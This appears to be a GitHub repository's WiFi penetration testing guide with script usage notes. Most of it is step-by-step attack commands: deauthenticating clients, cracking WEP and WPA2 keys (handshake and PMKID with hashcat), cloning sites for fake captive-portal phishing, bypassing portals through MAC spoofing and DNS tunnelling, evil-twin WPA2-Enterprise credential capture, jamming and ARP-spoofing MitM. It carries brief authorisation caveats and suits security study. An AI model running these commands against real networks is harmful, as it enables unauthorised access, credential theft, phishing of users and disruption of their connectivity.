sh change_mac_ip.sh $INTERFACE $IP_ADDRESS $GATEWAY $MAC_ADDRESS
30 | ```
31 |
32 | - *get_mac_ip.py* - List IP and MAC addresses of devices in your network
33 |
34 | ```
35 | python get_mac_ip.py [-h] -i INTERFACE -a ADDRESS
36 | ```
37 |
38 | - *get_mac_ip.sh* - List IP and MAC addresses of devices in your network
39 |
40 | ```
41 | sh get_mac_ip.sh $NETWORK
42 | ```
43 |
44 | Example: *sh get_mac_ip.sh 192.168.79.0/24*
45 |
46 |
- *iodine_server.sh* - Start the iodine server (the password is passed on the command line, so it is visible in the process list while the server runs)
48 |
49 | ```
50 | sh iodine_server.sh $PASSWORD $DNS_SERVER_IP $DOMAIN
51 | ```
52 |
- *iodine_client.sh* - Connect to the iodine server (same password caveat; iodine does not encrypt the tunnelled traffic, so run SSH or a VPN through it)
54 |
55 | ```
56 | sh iodine_client.sh $PASSWORD $DNS_SERVER_IP $DOMAIN
57 | ```
58 |
59 | - *start_ettercap.sh* - Run ettercap in graphical mode
60 |
61 | ```
62 | sh start_ettercap.sh
63 | ```
64 |
65 | - *start_wireshark.sh* - Run wireshark
66 |
67 | ```
68 | sh start_wireshark.sh
69 | ```
70 |
71 |
72 | # Other frameworks
73 |
`other_frameworks/install.sh` downloads and installs the following frameworks. Each one is cloned from its upstream repository without pinning and its setup script is then run as root, so review the checkouts before running it outside a disposable lab machine:
75 | - wifiphisher
76 | - wifijammer
77 | - SniffAir
78 | - WiFi-Pumpkin
79 | - eaphammer
80 |
81 |
82 | ## WEP
83 |
84 | - *wep_monitor.sh* - Set monitor mode and start monitoring networks
85 |
86 | ```
87 | sh wep_monitor.sh $INTERFACE $PCAP_NAME
88 | ```
89 |
- *wep_attack.sh* - Attack the network (fake authentication + ARP request replay + one client deauth) and let it run until airodump-ng shows around 100,000 IVs
91 |
92 | ```
sh wep_attack.sh $INTERFACE $AP_MAC $MY_MAC $CLIENT_MAC
94 | ```
95 |
- *wep_crack.sh* - Crack the WEP key from the capture file (airodump-ng writes it as `$PCAP_NAME-01.cap`)
97 |
98 | ```
99 | sh wep_crack.sh $PCAP_NAME
100 | ```
101 |
102 |
103 | ## WPA
104 |
105 | - *wpa_monitor.sh* - Set monitor mode and start monitoring networks
106 |
107 | ```
108 | sh wpa_monitor.sh $INTERFACE $PCAP_NAME
109 | ```
110 |
111 | - *wpa_attack.sh* - Deauthenticate a client to get a 4-way handshake to crack
112 |
113 | ```
114 | sh wpa_attack.sh $INTERFACE $AP_MAC $CLIENT_MAC
115 | ```
116 |
- *wpa_crack.sh* - Crack the handshake in the capture file (`$PCAP_NAME-01.cap` as written by airodump-ng) using Aircrack-ng; WPA cracking needs a wordlist (`aircrack-ng -w $WORDLIST ...`)
118 |
119 | ```
120 | sh wpa_crack.sh $PCAP_NAME
121 | ```
122 |
- *wpa_pyrit.sh* - Crack the capture file using Pyrit (the wordlist is read from the `WORDLIST` environment variable)
124 |
125 | ```
126 | sh wpa_pyrit.sh $PCAP_NAME
127 | ```
128 |
- *pmkid_install.sh* - Build and install hcxdumptool and hcxtools from their GitHub sources for the PMKID attack (unpinned clones; review them first)
130 |
131 | ```
132 | sh pmkid_install.sh
133 | ```
134 |
- *pmkid.sh* - Run the PMKID attack against one AP (the monitor-mode interface is read from the `IFACE` environment variable; needs root)
136 |
137 | ```
IFACE=$MON_INTERFACE sh pmkid.sh $MAC_ADDRESS $DICTIONARY
139 | ```
140 |
141 | - *py_pmkid.py* - Run the PMKID attack
142 |
143 | ```
144 | python py_pmkid.py [-h] [-f FILTER_FILE] [-p PCAP_FILE] [-j HASH_FILE] -d DICTIONARY -i MON_INTERFACE -m MAC_ADDRESS
145 | ```
146 |
147 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # WiFi Penetration Testing Guide
2 |
3 | ## Index
4 |
5 | 1. [Basic commands](#1)
6 |
7 | 2. [Open networks](#2)
8 |
9 | 2.1. [Captive portals](#21)
10 |
11 | 2.2. [Man in the Middle attack](#22)
12 |
13 | 3. [WEP cracking](#3)
14 |
15 | 3.1. [No clients](#31)
16 |
17 | 4. [WPA2-PSK cracking](#4)
18 |
19 | 4.1. [Cracking the 4-way-handshake](#41)
20 |
21 | 4.2. [PMKID attack](#42)
22 |
23 | 4.3. [AP-less attack](#43)
24 |
25 | 5. [WPA2-Enterprise](#5)
26 |
27 | 5.1. [Fake Access Points](#51)
28 |
29 | 5.2. [Brute force](#52)
30 |
31 | 5.3. [EAP methods supported](#53)
32 |
33 | 6. [Other attacks](#6)
34 |
35 | 6.1. [Krack Attack and Frag Attack](#61)
36 |
37 | 6.2. [OSINT](#62)
38 |
39 | 6.3. [Wifi Jamming](#63)
40 |
41 | 6.4. [Other frameworks](#64)
42 |
43 | 7. [Post-exploitation](#7)
44 |
45 | 7.1. [Attacking the router](#71)
46 |
47 | 7.2. [Types of scanners](#72)
48 |
49 | 7.3. [Spoofing](#73)
50 |
51 | -------------------------
52 |
53 |
54 |
55 | # 1. Basic commands
56 |
57 |
58 | #### Set environment variable
59 |
60 | ```bash
61 | VARIABLE=value
62 | ```
63 |
64 | #### Check interface mode
65 |
66 | ```bash
67 | iwconfig $IFACE
68 | ```
69 |
70 | #### Check interface status
71 |
72 | ```bash
73 | ifconfig $IFACE
74 | ```
75 |
76 | #### Set monitor mode
77 |
78 | ```
79 | airmon-ng check kill
80 | ifconfig $IFACE down
81 | iwconfig $IFACE mode monitor
82 | ifconfig $IFACE up
83 | ```
84 |
85 |
86 | #### List networks
87 |
88 | 1. Set monitor mode
89 |
2. Run Airodump-ng (`-c` and `-e` are optional and restrict the capture to one channel / ESSID; omit them to list everything)
91 |
92 | ```bash
93 | airodump-ng $IFACE -c $CHANNEL -e $ESSID
94 | ```
95 |
96 |
97 | #### Deauthentication
98 |
99 | 1. Only one client
100 |
101 | ```bash
102 | aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
103 | ```
104 |
105 | 2. An Access Point (= all the clients in the AP)
106 |
107 | ```bash
108 | aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC $IFACE
109 | ```
110 |
111 | #### Get hidden SSID with clients
112 |
113 | 1. List networks
114 |
115 | List the networks using Airodump-ng and get the AP's MAC address ($AP_MAC) and one from a client ($CLIENT_MAC). Do not stop the capture.
116 |
117 | 2. Deauthenticate
118 |
119 | In another terminal, deauthenticate a client or all of them. When Airodump-ng captures a handshake from this network, the name or ESSID will appear in the first terminal:
120 |
121 | ```bash
122 | aireplay-ng -0 $NUMBER_DEAUTH_PACKETS -a $AP_MAC -c $CLIENT_MAC $IFACE
123 | ```
124 |
125 | #### Get hidden SSID without clients
126 |
127 | 1. List networks
128 |
List the networks using Airodump-ng and get the AP's MAC address ($AP_MAC) and channel ($AP_CHANNEL). With no client to deauthenticate, the SSID has to be guessed by sending probe requests with mdk3; the real name shows up in Airodump-ng when a guess is right. Do not stop the capture.
130 |
131 | 2.a. Execute a dictionary attack
132 |
133 | ```
134 | mdk3 $IFACE p -t $AP_MAC -f $DICTIONARY_PATH
135 | ```
136 |
137 | 2.b. Or execute a bruteforce attack
138 |
139 | ```
mdk3 $IFACE p -t $AP_MAC -c $AP_CHANNEL -b $CHARACTER_SET
141 | ```
142 |
For the character set it is possible to use *l* (lowercase letters), *u* (uppercase letters), *n* (numbers), *c* (lowercase+uppercase), *m* (lowercase+uppercase+numbers) or *a* (all printable characters). Note that the `-c` option above must be an ASCII "c"; the original text contained a Cyrillic look-alike that mdk3 does not recognise.
144 |
145 | -------------------------
146 |
147 |
148 |
149 | # 2. Open networks
150 |
151 | ## 2.1. Captive portals
152 |
153 | ### 2.1.1. Fake captive portals
154 |
155 |
156 | 1. Clone a website using [HTTrack](https://www.httrack.com/)
157 |
2. Install [Wifiphisher](https://github.com/wifiphisher/wifiphisher). Add the HTTrack result in a new folder in *wifiphisher/data/phishing-pages/*new_page*/html* and a configuration file in *wifiphisher/data/phishing-pages/*new_page*/config.ini*.
159 |
3. Reinstall the project with *python setup.py install* so the new page is picked up, or run the binary from *bin* directly.
161 |
162 | 4. This command works correctly in the latest Kali release after installing hostapd:
163 |
164 | ```
165 | cd bin && ./wifiphisher -aI $IFACE -e $ESSID --force-hostapd -p $PLUGIN -nE
166 | ```
167 |
168 |
169 |
170 | ### 2.1.2. Bypass 1: MAC spoofing
171 |
The first method to bypass a captive portal is to change your MAC (and IP) address to those of a client that has already authenticated. While that client is still online the two devices clash (duplicate IP and MAC), which disrupts its connection and is easy to notice, so only do this on networks you are authorised to test.
173 |
174 | 1. Scan the network and get the list of IP and MAC addresses. You can use:
175 |
176 | - nmap
177 |
178 | - A custom script like [this](scripts/open/get_mac_ip.sh) (Bash) or [this](scripts/open/get_mac_ip.py) (Python)
179 |
180 | 2. Change your IP and MAC addresses. You can use:
181 |
182 | - macchanger
183 |
184 | - A custom script like [this](scripts/open/change_mac_ip.sh)(Bash)
185 |
186 |
187 | Also, you can use scripts to automate the process like:
188 |
189 | - [Poliva script](https://raw.githubusercontent.com/poliva/random-scripts/master/wifi/hotspot-bypass.sh)
190 |
191 | - [Hackcaptiveportals](https://github.com/systematicat/hack-captive-portals)
192 |
193 |
194 |
195 | ### 2.1.3. Bypass 2: DNS tunnelling
196 |
A second method is creating a DNS tunnel. For this you need an Internet-facing server of your own that is authoritative for a subdomain. It works because many captive portals let DNS queries through before you authenticate, so the tunnelled traffic rides on those queries. People use this to bypass the portal and get "free" Wi-Fi in hotels, airports...; only do it where you are authorised to.
198 |
199 |
1. Check that the portal lets DNS queries through (the lookup must succeed before you are logged in; if it fails, the tunnel will not work either):
201 |
202 | ```
203 | nslookup example.com
204 | ```
205 |
206 | 2. Create 2 DNS records (in [Digital ocean](https://www.digitalocean.com/), [Afraid.org](http://freedns.afraid.org/)...):
207 |
208 | - One "A record": dns.$DOMAIN pointing to the $SERVER_IP (Example: dns.domain.com 139.59.172.117)
209 |
210 | - One "NS record": hack.$DOMAIN pointing to dns.$DOMAIN (Example: hack.domain.com dns.domain.com)
211 |
212 |
213 | 3. Execution in the server
214 |
215 | ```
216 | iodined -f -c -P $PASS -n $SERVER_IP 10.0.0.1 hack.$DOMAIN
217 | ```
218 |
219 | 4. Check if it works correctly in [here](https://code.kryo.se/iodine/check-it/)
220 |
221 |
222 | 5. Execution in the client
223 |
224 | ```
225 | iodine -f -P $PASS $DNS_SERVER_IP hack.$DOMAIN
226 | ```
227 |
6. Create an SSH SOCKS proxy through the tunnel. iodine authenticates the peer with the password but does not encrypt the tunnelled traffic, so SSH (or a VPN) over it is what actually protects your data:
229 |
230 | ```
231 | ssh -D 8080 $USER@10.0.0.1
232 | ```
233 |
234 |
235 |
236 | ## 2.2. Man in the Middle attack
237 |
238 | Once you are in the network, you can test if it is vulnerable to Man in the Middle attacks.
239 |
240 | 1. ARP Spoofing attack using [Ettercap](https://www.ettercap-project.org/)
241 |
242 | 2. Sniff the traffic using Wireshark or TCPdump
243 |
244 | 3. Analyze the traffic using [PCredz](https://github.com/lgandx/PCredz) (Linux) or [Network Miner](https://www.netresec.com/?page=networkminer) (Windows)
245 |
246 | -------------------------
247 |
248 |
249 |
250 | # 3. WEP cracking
251 |
252 | 1. Start capture
253 | ```bash
254 | airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
255 | ```
256 |
257 |
2. Accelerate the IV capture using *Fake authentication* + *ARP request replay* + *Deauthenticate user*. The replay attack (`-3`) runs until interrupted, so start it in a separate terminal or in the background before sending the deauth. Stop Airodump at ~100,000 different IVs
259 |
260 | ```bash
261 | aireplay-ng -1 0 -e $AP_NAME -a $AP_MAC -h $MY_MAC $IFACE
262 | aireplay-ng -3 -b $AP_MAC -h $MY_MAC $IFACE
263 | aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
264 | ```
265 |
3. Crack the key using Aircrack-ng. `airodump-ng -w $PCAP_FILE` above wrote the capture as `$PCAP_FILE-01.cap`, so pass that file:
267 | ```bash
268 | aircrack-ng $PCAP_FILE
269 | ```
270 |
271 |
272 | -------------------------
273 |
274 |
275 |
276 |
277 | # 4. WPA2-PSK cracking
278 |
279 | ## 4.1. Cracking the 4-way-handshake
280 |
281 | 1. Start capture
282 |
283 | ```bash
284 | airodump-ng -c $AP_CHANNEL --bssid $AP_MAC -w $PCAP_FILE $IFACE
285 | ```
286 |
2. Deauthenticate a client. Stop the airodump-ng capture when its header shows 'WPA handshake: $AP_MAC'
288 |
289 | ```bash
290 | aireplay-ng -0 1 -a $AP_MAC -c $STATION_MAC $IFACE
291 | ```
292 |
3. Option 1: Crack the handshake using Aircrack-ng (the capture written above is `$PCAP_FILE-01.cap`; replace `capture.cap` with it)
294 |
295 | ```bash
296 | aircrack-ng -w $WORDLIST capture.cap
297 | ```
298 |
299 | You can get wordlists from [here](https://github.com/kennyn510/wpa2-wordlists).
300 |
301 | 4. Option 2: Crack the handshake using Pyrit
302 |
303 | ```
304 | pyrit -r $PCAP_FILE analyze
305 | pyrit -r $PCAP_FILE -o $CLEAN_PCAP_FILE strip
306 | pyrit -i $WORDLIST import_passwords
307 | pyrit eval
308 | pyrit batch
309 | pyrit -r $CLEAN_PCAP_FILE attack_db
310 | ```
311 |
312 |
313 |
314 | ## 4.2. PMKID attack
315 |
316 | You can use [this script](scripts/wpa/pmkid.sh) or follow these steps:
317 |
1. Install hcxdumptool and hcxtools (you can use this [script](scripts/wpa/pmkid_install.sh); it builds unpinned GitHub checkouts and runs `make install` as root, so review them first).
319 |
320 | 2. Stop Network Manager
321 |
322 | ```bash
323 | airmon-ng check kill
324 | ```
325 |
326 |
327 |
328 | 3a. If you want to attack a specific MAC address
329 |
330 | - Create a text file ($FILTER_FILE) and add the MAC address without ":". You can use *sed* and redirect the output to a file:
331 |
332 | ```
333 | echo $MAC | sed 's/://g' > $FILTER_FILE
334 | ```
335 |
336 | - Capture PMKID
337 |
338 | ```bash
339 | hcxdumptool -i $IFACE -o $PCAPNG_FILE --enable_status=1 --filterlist=$FILTER_FILE --filtermode=2
340 | ```
341 |
342 | 4. Create $HASH_FILE
343 |
344 | ```bash
345 | hcxpcaptool -z $HASH_FILE $PCAPNG_FILE
346 | ```
347 |
Each line has the form `PMKID*AP MAC*STATION MAC*ESSID`, with the ESSID hex-encoded (decode it at: https://www.rapidtables.com/convert/number/hex-to-ascii.html)
349 |
5. Crack it using Hashcat (mode 16800). Newer hashcat releases replace it with mode 22000, whose input comes from `hcxpcapngtool` instead of `hcxpcaptool`; check the versions you have installed. `--force` only silences hashcat's warnings about unsupported OpenCL runtimes and should be dropped once the drivers are set up properly.
351 |
352 | ```bash
353 | hashcat -a 0 -m 16800 $HASH_FILE $WORDLIST --force
354 | ```
355 |
356 |
357 |
358 | ## 4.3. AP-less attack
359 |
If you have access to a client device with Wi-Fi turned on but the target network is not in range, you can still attack that network as long as the client has previously connected to it.
361 |
For that, create a Fake Access Point using hostapd with a configuration file like [this one](https://gist.github.com/nickpegg/059ad1e0a0a14671892e), with any password but the same network name (SSID). When the client tries to join, it sends the second message of the 4-way handshake, whose MIC is computed from its stored PSK; that pair of messages is enough for the dictionary attack of the [4.1 section in this guide](#41), so the password you configured on the fake AP does not matter.
363 |
364 |
365 | -------------------------
366 |
367 |
368 |
369 | # 5. WPA2-Enterprise
370 |
371 | ## 5.1 Fake Access Points
372 |
373 | ### Virtual machines download
374 |
375 | | Operating system | Platform | Credentials | Size | Link |
376 | | ---------------- | -------- | ----------- | ---- | ---- |
377 | | Ubuntu 16.04.5 | VMware | ricardojoserf:wifi | 3.25 GB | [MEGA](https://mega.nz/file/5glEzKKa#SCmh95KdM28uPt-h8J5xtu4pQrnn_3yrI2kLnaSq3nw) |
378 | | Kali 2019.1 | VMware | root:wifi | 4.99 GB | [MEGA](https://mega.nz/file/11sDVSoB#KMq5yWvuGUFwGhqzd-5hE21Xsfxsp0UMauQKntMbs38) |
379 | | Ubuntu 16.04.5 | VirtualBox (OVA) | ricardojoserf:wifi | 3.18 GB | [MEGA](https://mega.nz/file/N5slGZLC#Dx1rBEMoNOAqdaEpB7BHhRi26HDxkJlyoQNk0frWDkw) |
380 | | Kali 2019.1 | VirtualBox (OVA) | root:wifi | 5.56 GB | [MEGA](https://mega.nz/file/pl0j3ZwC#zE_skdeUCLoOSQHvtHrvejmA4Ktn9Qk0Sk0qI1d4KeI) |
381 |
382 | ### Local installation
383 |
384 | In case you do not want to use the virtual machine, you can install everything using:
385 |
386 | ```
387 | git clone https://github.com/ricardojoserf/WPA_Enterprise_Attack
388 |
389 | cd WPA_Enterprise_Attack && sudo sh install.sh
390 | ```
391 |
392 | ### Hostapd & Freeradius-wpe
393 |
394 | Start the Access Point using:
395 |
396 | ```
397 | sh freeradius_wpe_init.sh $AP_NAME $INTERFACE
398 | ```
399 |
400 | When a client connects, read logs with:
401 |
402 | ```
403 | sh freeradius_wpe_read.sh
404 | ```
405 |
406 | ### Hostapd-wpe
407 |
408 | ```
409 | sh hostapd_wpe_init.sh $AP_NAME $INTERFACE
410 | ```
411 |
412 |
413 |
414 | ## 5.2 Brute force
415 |
416 | - [Airhammer](https://github.com/Wh1t3Rh1n0/air-hammer)
417 |
418 | ## 5.3 EAP methods supported
419 |
Enumerate which EAP methods the RADIUS server accepts (useful to decide whether a fake AP offering a weaker method will be accepted by clients)
421 |
422 | - [EAP_buster](https://github.com/blackarrowsec/EAP_buster)
423 |
424 | -------------------------
425 |
426 |
427 |
428 | # 6. Other attacks
429 |
430 |
431 | ## 6.1. Krack Attack and Frag Attack
432 |
433 | These are two advanced attacks discovered by the great [Mathy Vanhoef](https://twitter.com/vanhoefm):
434 |
435 | - [Krack Attack Scripts](https://github.com/vanhoefm/krackattacks-scripts) - Explained in [this website](https://www.krackattacks.com/)
436 |
437 | - [Frag Attack Scripts](https://github.com/vanhoefm/fragattacks) - Explained in [this website](https://www.fragattacks.com/)
438 |
439 |
440 | ## 6.2. OSINT
441 |
442 | - [Wigle](https://wigle.net/)
443 |
444 |
445 |
446 | ## 6.3. Wifi Jamming
447 |
448 | - [Wifijammer](https://github.com/DanMcInerney/wifijammer) - This program can send deauthentication packets to both APs and clients.
449 |
An example to deauthenticate all the devices except a Fake Access Point (`-s` skips the given MAC):
451 |
452 | ```
453 | sudo ./wifijammer -i $IFACE -s $FAKE_AP_MAC
454 | ```
455 |
456 | ## 6.4. Other frameworks
457 |
458 | Linux:
459 | - [Sniffair](https://github.com/Tylous/SniffAir)
460 | - [Wifi Pumpkin](https://github.com/P0cL4bs/wifipumpkin3) - Framework for Rogue WiFi Access Point Attack
461 | - [Eaphammer](https://github.com/s0lst1c3/eaphammer) - Framework for Fake Access Points
462 | - [WEF](https://github.com/D3Ext/WEF) - Framework for different types of attacks for WPA/WPA2 and WEP, automated hash cracking and more
463 |
464 | Windows:
465 | - [Acrylic](https://www.acrylicwifi.com) - Useful for recon phase
466 | - [Ekahau](https://www.ekahau.com/) - Useful for Wi-Fi planning
467 | - [Vistumbler](https://www.vistumbler.net/) - Useful for wardriving
468 |
469 |
470 |
471 |
472 | -------------------------
473 |
474 |
475 |
476 | # 7. Post-exploitation
477 |
Once you are connected to the network:
479 |
480 | ## 7.1. Attacking the router
481 |
482 | - [Routersploit](https://github.com/threat9/routersploit) - Exploitation Framework for Embedded Devices - Test "use scanners/autopwn"
483 |
484 | ## 7.2. Types of scanners
485 |
486 | - Nmap/Zenmap - Security Scanner, Port Scanner, & Network Exploration Tool
487 |
- Masscan - A much faster port scanner than nmap; its packet rate can knock over embedded devices, so throttle it (`--rate`) and be careful
489 |
490 | - Netdiscover - ARP sniffing. Very useful if the networks are very well segmented
491 |
492 | ## 7.3. Spoofing
493 |
494 | - Ettercap - Check if you can do a MitM attack and sniff all the traffic in the network
495 |
496 |
--------------------------------------------------------------------------------